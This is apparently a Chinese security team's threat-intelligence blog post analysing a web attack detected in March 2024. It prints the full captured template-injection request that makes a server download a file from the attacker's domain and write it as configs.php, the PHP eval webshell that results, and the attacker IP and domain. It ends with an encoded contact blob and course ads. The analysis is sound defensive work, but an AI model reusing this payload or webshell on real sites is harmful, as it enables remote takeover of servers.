【威胁情报】两*会重保威胁情报披露一【高级攻击】

【网络运维渗透团队已经累计向CNVD提供100+通用漏洞】

2024年3月4号至3月10号，全*国*两*会召开期间，网络运维渗透团队的师傅们也在尽自己的一份力量！

【威胁事件】

3月4号至3月10号，某个夜深人静的夜晚，沈公子在“天眼”上发现较高级的黑客攻击。数据包如下：

HEAD /?t=file_put_contents&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t2=file_get_contents&tagstpl=news.html&t1=./data/configs.php&t3=https://mig.75795ddn.fun/qwex.txtremote_addr: 53.81.22.105referer: http://x.x.x.x//?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=./data/configs.php&t2=file_get_contents&t3=https://mig.75795ddn.fun/qwex.txthost: x.x.x.xclient-ip: 53.81.22.105content-type: text/htmlx-forwarded-for: 53.81.22.105accept: text/html, application/xhtml+xml, */*user-agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.htmlCookie: HWWAFSESID=83xxxxx2ac5a; HWWAFSESTIME=1xxxxx37655

安全防护设备并没有识别该攻击行为，团队的沈公子凭借多年的经验和敏锐的观察力发现这是一个“非同寻常”的黑客攻击。

首先黑客用的HEAD方法，路径中包含较复杂的代码：

/?t=file_put_contents&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t2=file_get_contents&tagstpl=news.html&t1=./data/configs.php&t3=https://mig.75795ddn.fun/qwex.txt

URL解码：

/?t=file_put_contents&tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}&t2=file_get_contents&tagstpl=news.html&t1=./data/configs.php&t3=https://mig.75795ddn.fun/qwex.txt

以上代码详细分析如下：

- 首先t=file_put_contents：这个参数看起来是尝试调用 PHP 的 file_put_contents 函数，该函数用于将字符串写入文件。

-tag={pbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))}ok{/pbohome/Indexot:if}。这部分看起来像是尝试利用模板引擎或某种解析器的漏洞，通过注释和特殊构造绕过安全限制。

- t2=file_get_contents：这个参数似乎是尝试调用 PHP 的 file_get_contents 函数，该函数用于读取文件内容或网络资源的内容。

- tagstpl=news.html：这个参数可能是指定某种模板文件，可能与漏洞利用有关。

- t1=./data/configs.php：这个参数指定了一个目标文件路径，看起来是尝试写入或修改该文件。

- t3=https://mig.75795ddn.fun/qwex.txt：这个参数指定了一个远程URL，可能是恶意代码或者是攻击者想要下载并执行的脚本。

这个请求的目的是黑客在尝试通过漏洞执行远程代码。攻击者试图通过 file_put_contents 函数将从 t3 参数指定的URL下载的内容写入到 t1 参数指定的文件中。这是一种Webshell植入攻击，旨在通过修改服务器上的文件来获取远程控制权。

远程下载代码：https://mig.75795ddn.fun/qwex.txt

<?php var_dump(md5(123));$content=stripslashes($_POST[1]);eval($content); ?>

这是一个简单的变量混淆的WEBshell，并且写入成功访问：http://target.com/data/configs.php 会打印123 的md5值。

从文件命名【qwex.txt】【webshell】内容来看，初步猜测属于国内黑客。购买国外【德国】服务器，进行高级的黑客攻击活动。

如果是国内专业红队，不好意思，碰到我们了，赶紧换服务器吧！向你们老大申请预算，重新购买吧！！！哈哈哈！！！

如果是国外真实黑客，赶紧，网安警察叔叔，靠你们了！！！

【威胁情报分析】

恶意IP：53.81.22.105

可以看到，微步情报局并未进行标记，可见该黑客的警惕性是比较强的，低级的扫描动作不会做。

归属地：德国巴登－符腾堡州斯图加特梅赛德斯奔驰

该IP并未绑定域名。

远程恶意域名：mig.75795ddn.fun

恶意URL：

https://mig.75795ddn.fun/qwex.txt

服务商为

Hong Kong Juming Network Technology Co., Ltd.

服务器DNS：

JM1.DNS.COM

JM2.DNS.COM

可以看到该域名也是没有标记的。不排除这是黑客拿下的“肉鸡”

WHOIS：

可以看到WHOIS查询中的域名设置了隐私保护，可见其警惕性之高。并且域名注册机构为 Redacted for privacy。当域名处于REDACTED FOR PRIVACY状态，注册商将发送你的个人信息到注册局 (例如 .design域) ，但是当隐私保护启用，除非注册局要求否则注册商不会主动发送你的个人信息。

数字证书：

子域名：

【威胁情报】

恶意IP：53.81.22.105

远程恶意域名：mig.75795ddn.fun

恶意URL：

https://mig.75795ddn.fun/qwex.txt

知法懂法，请各位网络安全从业者遵守《网络安全法》、《个人信息保护法》

业*&&务**&联&&*&系

XHU3ZjUxXHU3ZWRjXHU4ZmQwXHU3ZWY0XHU2ZTE3XHU5MDBmXHU1NmUyXHU5NjFmXHUyMDBiXHU2MjdmXHU2M2E1XHVmZjFhXHVhXHUwMDMxXHUwMDJlXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHU2MzE2XHU2Mzk4XHVmZjFiXHVhXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4ZDJkXHU0ZTcwXHU4OWM0XHU1MjE5XHVmZjFhXHVhXHU3ZjE2XHU1M2Y3XHU3YzdiXHVmZjFhXHVhXHU5XHU0ZThiXHU0ZWY2XHU1NzhiXHU0ZTJkXHU1MzcxXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU3ZjE2XHU1M2Y3XHVmZjFhXHUwMDMxXHUwMDM1XHUwMDMwXHVhXHU5XHU0ZThiXHU0ZWY2XHU1NzhiXHU5YWQ4XHU1MzcxXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU3ZjE2XHU1M2Y3XHVmZjFhXHUwMDMzXHUwMDMwXHUwMDMwXHVhXHU5XHU5MDFhXHU3NTI4XHU1NzhiXHU0ZjRlXHU1MzcxXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU3ZjE2XHU1M2Y3XHVmZjFhXHUwMDMyXHUwMDMwXHUwMDMwXHVhXHU5XHU5MDFhXHU3NTI4XHU1NzhiXHU0ZTJkXHU1MzcxXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU3ZjE2XHU1M2Y3XHVmZjFhXHUwMDMzXHUwMDM1XHUwMDMwXHVhXHU5XHU5MDFhXHU3NTI4XHU1NzhiXHU5YWQ4XHU1MzcxXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU3ZjE2XHU1M2Y3XHVmZjFhXHUwMDM1XHUwMDMwXHUwMDMwXHVhXHU5XHU4YmY0XHU2NjBlXHVmZjFhXHU5MDFhXHU3NTI4XHU1NzhiXHU2ZjBmXHU2ZDFlXHU3ZjE2XHU1M2Y3XHU0ZTNiXHU4OTgxXHU5NDg4XHU1YmY5XHU3YjI2XHU1NDA4XHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU2ZjBmXHU2ZDFlXHU2NTM2XHU1ZjU1XHU3Njg0XHU0ZThiXHU0ZWY2XHU1NzhiXHU2ZjBmXHU2ZDFlXHU0ZjAxXHU0ZTFhXHUzMDAxXHU1ZjAwXHU2ZTkwXHU3YTBiXHU1ZThmXHVmZjBjXHU1MTZjXHU1M2Y4XHU4ZDQ0XHU0ZWE3XHU2NzJhXHU4ZmJlXHU1MjMwXHUwMDM1XHUwMDMwXHUwMDMwXHUwMDMwXHU0ZTA3XHU0ZWU1XHU0ZTBhXHU3Njg0XHU1MzgyXHU1YmI2XHU0ZWE3XHU1NGMxXHU3YjQ5XHU4ZmRiXHU4ODRjXHU2ZjBmXHU2ZDFlXHU2MzE2XHU2Mzk4XHUzMDAyXHVhXHVhXHU4YmMxXHU0ZTY2XHU3YzdiXHVmZjFhXHVhXHUwMDIwXHUwMDIwXHU5YWQ4XHU1MzcxXHU0ZThiXHU0ZWY2XHU1NzhiXHU4YmMxXHU0ZTY2XHVmZjFhXHUwMDMxXHUwMDMwXHUwMDMwXHUwMDMwXHVhXHVhXHUwMDIwXHUwMDIwXHU0ZTJkXHU1MzcxXHU5MDFhXHU3NTI4XHU1NzhiXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHVmZjFhXHVhXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHU2NzJhXHU2Mzg4XHU2NzQzXHU0ZWZiXHU2MTBmXHU2NTg3XHU0ZWY2XHU0ZTBiXHU4ZjdkXHUwMDJmXHU4YmZiXHU1M2Q2XHU3YzdiXHU2ZjBmXHU2ZDFlXHVmZjFhXHUwMDM3XHUwMDMwXHUwMDMwXHVhXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHU1MTc2XHU0ZWQ2XHU2NzJhXHU2Mzg4XHU2NzQzXHU4YmJmXHU5NWVlXHUzMDAxXHU0ZmUxXHU2MDZmXHU2Y2M0XHU5NzMyXHU3YzdiXHU2ZjBmXHU2ZDFlXHVmZjFhXHUwMDM2XHUwMDMwXHUwMDMwXHVhXHVhXHU5YWQ4XHU1MzcxXHU5MDFhXHU3NTI4XHU1NzhiXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHVmZjFhXHVhXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHU1M2VmXHU3NmY0XHU2M2E1XHU4M2I3XHU1M2Q2XHUwMDczXHUwMDY4XHUwMDY1XHUwMDZjXHUwMDZjXHU3YzdiXHVmZjA4XHUwMDUyXHUwMDQzXHUwMDQ1XHUwMDJmXHU0ZWZiXHU2MTBmXHU2NTg3XHU0ZWY2XHU0ZTBhXHU0ZjIwXHVmZjA5XHVmZjFhXHUwMDMxXHUwMDM4XHUwMDMwXHUwMDMwXHVhXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDIwXHUwMDUzXHUwMDUxXHUwMDRjXHU2Y2U4XHU1MTY1XHU3YzdiXHVmZjFhXHUwMDMxXHUwMDMzXHUwMDMwXHUwMDMwXHVhXHVhXHU4YmY0XHU2NjBlXHVmZjFhXHU5MDFhXHU3NTI4XHU1NzhiXHUwMDJmXHU0ZThiXHU0ZWY2XHU1NzhiXHUwMDIwXHU5YWQ4XHU1MzcxXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHU0ZTNiXHU4OTgxXHU5NDg4XHU1YmY5XHU1MTZjXHU1M2Y4XHU4ZDQ0XHU0ZWE3XHU4ZmJlXHU1MjMwXHUwMDM1XHUwMDMwXHUwMDMwXHUwMDMwXHU0ZTA3XHU0ZWU1XHU0ZTBhXHU3Njg0XHU1MzgyXHU1YmI2XHU0ZWE3XHU1NGMxXHVmZjBjXHU0ZTE0XHU2ZjBmXHU2ZDFlXHU3NzFmXHU1YjllXHU1YjU4XHU1NzI4XHU4MGZkXHU1ZTI2XHU2NzY1XHU1ZGU4XHU1OTI3XHU1MzcxXHU1YmIzXHUzMDAyXHVhXHU2Y2U4XHU2MTBmXHVmZjFhXHU4ZDJkXHU0ZTcwXHU5YWQ4XHU1MzcxXHVmZjFhXHUwMDQzXHUwMDRlXHUwMDU2XHUwMDQ0XHU4YmMxXHU0ZTY2XHU3ZWVkXHU3YjdlXHU2MjdmXHU4YmZhXHU0ZTY2XHVmZjBjXHU0ZWU1XHU0ZmRkXHU4YmMxXHU0ZTBkXHU3NTI4XHU0ZThlXHU4ZmRkXHU2Y2Q1XHU3MmFmXHU3ZjZhXHUzMDAyXHVhXHVhXHU1MTQ4XHU0ZWQ4XHU1YjlhXHU5MWQxXHVmZjBjXHU1MThkXHU3ZWQ5XHU2MmE1XHU1NDRhXHVmZjBjXHU1OTgyXHU2ZjBmXHU2ZDFlXHU0ZTBkXHU5MDFhXHU4ZmM3XHVmZjBjXHU1M2VmXHU5NjhmXHU2NWY2XHU2MjdlXHU2MjExXHVmZjBjXHU1YmY5XHU1YmEyXHU2MjM3XHU0ZTAwXHU1YjlhXHU4ZDFmXHU4ZDIzXHU1MjMwXHU1ZTk1XHUzMDAyXHVhXHVhXHUwMDQzXHUwMDU2XHUwMDQ1XHVmZjFhXHU2NTg3XHU0ZWY2XHU0ZTBhXHU0ZjIwXHUwMDJmXHUwMDUyXHUwMDQzXHUwMDQ1XHU3YzdiXHU1NzhiXHVmZjFhXHUwMDMxXHUwMDMwXHUwMDMwXHUwMDMwXHVhXHU1MTc2XHU0ZWQ2XHU3YzdiXHU1NzhiXHVmZjFhXHUwMDM1XHUwMDMwXHUwMDMwXHVhXHVhXHU4ZDJkXHU0ZTcwXHU1NmRiXHU0ZTJhXHU0ZTJkXHU1MzcxXHU2ZjBmXHU2ZDFlXHU4YmMxXHU0ZTY2XHUwMDJiXHU4ZDYwXHU5MDAxXHU0ZTAwXHU0ZTJhXHU0ZTJkXHU1MzcxXHU2ZjBmXHU2ZDFlXHU4YmMxXHU0ZTY2XHVhXHU4ZDJkXHU0ZTcwXHU0ZTI0XHU0ZTJhXHU5YWQ4XHU1MzcxXHU2ZjBmXHU2ZDFlXHU4YmMxXHU0ZTY2XHU0ZTAwXHU0ZTJhXHU0ZTJkXHU1MzcxXHU2ZjBmXHU2ZDFlXHU4YmMxXHU0ZTY2XHUwMDJiXHU4ZDYwXHU5MDAxXHU0ZTAwXHU0ZTJhXHU0ZTJkXHU1MzcxXHU2ZjBmXHU2ZDFlXHU4YmMxXHU0ZTY2XHVhXHVhXHUwMDMyXHUwMDJlXHU2ZTE3XHU5MDBmXHU2ZDRiXHU4YmQ1XHVmZjA4XHU0ZTAwXHU0ZTJhXHU3Y2ZiXHU3ZWRmXHUwMDM4XHUwMDMwXHUwMDMwXHUwMDdlXHUwMDMxXHUwMDMwXHUwMDMwXHUwMDMwXHUwMDUyXHUwMDRkXHUwMDQyXHU0ZTAwXHU2YjIxXHU2ZTE3XHU5MDBmXHVmZjA5XHVmZjFiXHVhXHVhXHUwMDMzXHUwMDJlXHU3ZWEyXHU5NjFmXHU4YmM0XHU0ZjMwXHVmZjA4XHU3YTgxXHU3ODM0XHU4ZmRiXHU1MTg1XHU3ZjUxXHU3ZWQzXHU2YjNlXHVmZjBjXHU3NzBiXHU4M2I3XHU1M2Q2XHU2NzQzXHU5NjUwXHU3ZWQzXHU2YjNlXHVmZjFhXHUwMDM1XHUwMDMwXHUwMDMwXHUwMDMwXHUwMDdlXHUwMDMxXHUwMDMwXHUwMDU3XHVmZjA5XHVmZjFiXHVhXHVhXHUwMDM0XHUwMDJlXHU2MmE0XHU3ZjUxXHVmZjA4XHU1ZTAyXHU2MmE0XHU3ZjUxXHU0ZTAwXHU1MjA2XHUwMDM1XHUwMDdlXHUwMDM4XHU1MTQzXHUzMDAxXHU3NzAxXHU2MmE0XHU3ZjUxXHU0ZTAwXHU1MjA2XHUwMDM4XHUwMDdlXHUwMDMxXHUwMDMwXHU1MTQzXHUzMDAxXHU1NmZkXHU2MmE0XHU0ZTAwXHU1MjA2XHUwMDMxXHUwMDMwXHUwMDdlXHUwMDMxXHUwMDM1XHU1MTQzXHVmZjA5XHVmZjFiXHVhXHVhXHUwMDM1XHUwMDJlXHU0ZWUzXHU3ODAxXHU1YmExXHU4YmExXHVmZjA4XHU0ZTAwXHU4ODRjXHU0ZWUzXHU3ODAxXHU0ZTAwXHU1MTQzXHVmZjBjXHU1YzAxXHU5ODc2XHUwMDM4XHUwMDMwXHUwMDMwXHUwMDMwXHVmZjA5XHVmZjFiXHVhXHVhXHUwMDM2XHUwMDJlXHU1ZTk0XHU2MDI1XHU1NGNkXHU1ZTk0XHVmZjA4XHU3ZWJmXHU0ZTBhXHU4ZmRjXHU3YTBiXHVmZjFhXHUwMDM5XHUwMDMwXHUwMDMwXHU0ZTAwXHU2YjIxXHVmZjBjXHU3ZWJmXHU0ZTBiXHVmZjFhXHUwMDMxXHUwMDM1XHUwMDMwXHUwMDMwXHU0ZTAwXHU2YjIxXHVmZjA5XHUzMDAyXHVhXHVhXHU4MDU0XHU3Y2ZiXHU1ZmFlXHU0ZmUxXHVmZjA4XHU1MmE5XHU3NDA2XHU1YzBmXHU1OWQwXHU1OWQwXHVmZjA5XHVmZjFhXHUwMDUyXHUwMDYxXHUwMDYyXHUwMDYyXHUwMDY5XHUwMDc0XHUwMDJkXHUwMDRiXHUwMDYxXHUwMDcyXHUwMDY1XHUwMDZlXHUwMDcyXHUwMDMy

（base64 decode转unicode decode）

在这打个广告哈，想学Linux、Linux运维、Linux安全运维、考RHCSA/考RHCE的朋友，不要去报啥子培训班！不要去报啥子培训班！不要去报啥子培训班！买我的Linux专栏就够了。不要999，不要499，只要99 ！

想学网络安全的朋友哈，不要去报啥子培训班！不要去报啥子培训班！不要去报啥子培训班！买我的网络安全&云安全专栏就够了。不要999，不要499，只要99 ！

My github：https://github.com/ltfafei/

更多文章请前往：https://blog.csdn.net/qq_41490561

更多精彩内容请关注我们

往期推荐